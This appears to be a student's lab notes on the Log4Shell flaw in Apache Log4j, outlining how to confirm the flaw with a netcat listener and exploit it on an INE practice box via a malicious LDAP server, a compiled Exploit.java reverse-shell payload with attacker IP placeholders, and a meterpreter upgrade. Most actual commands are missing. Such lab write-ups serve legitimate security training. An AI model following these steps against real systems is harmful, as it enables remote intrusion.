Log4j Vulnerability (Log4Shell)
Vul reported on 9/Dec/2021 on Apache Java Logging Lib: Log4J
Background:
1-A quick 3 min video to get what all the fuss is about from Marcus Hutchins:
GOVCERT:
More practical Demonstration from Sophos:
Tut Notes:
Check if the server is vul:
1- start a server/listener:
2- send a request to the potential vul point:
if you received a conn (respond) in nc then it's vul.
Exploiting the vul in your own LDAP server:
we will be using the following script to automate: https://github.com/kozmer/log4j-shell-poc
1- Setup the a LDAP server so we can interpret the response:
#Exploit: is the name of the exploit we will creat.
inside the poc.py there's the java code (in comment) copy it to a new
Exploit.java
file cuz this is the exploit. and fill in yourString host="<attacker
IP>";
int port = <nc_
port>;
2-compiling the exploit:
-source: Java version
-target: JDK version
1 warning don't worry about it
3- Setup the server to host the Exploit:
8080 cuz that's the port we setup our ldap on.
4-Setup a listener to receive the conn from the target once it's exploited:
same port as the one in the Exploit.java
5-attack (sending the req):
<ldap_port>: from step 1
no reason to provide the extension ldap knows it by itself.
🎉Now in nc you received a conn. and now you have a reverse shell.🎉
you can spawn a bash shell:
and of course, you can upgrade to a meterpreter shell:
Solving INE Box:
target: demo.ine.local
My IP: 192.10.137.2
Footprinting:
runs Apache Tomcat while by default it doesn't really depend on Log4j but it can be config:
Apache Jserv interesting but not tatrget here I know this ver is vul.
Checking for the vul:
we got a respone in nc it's vul...😀
Time to exploit it:
my LDAP:
nc lisnter:
Compiling the Java Exploit (RevShell):
server Hosting the Exploit:
exploit:
Goal achived:
Last updated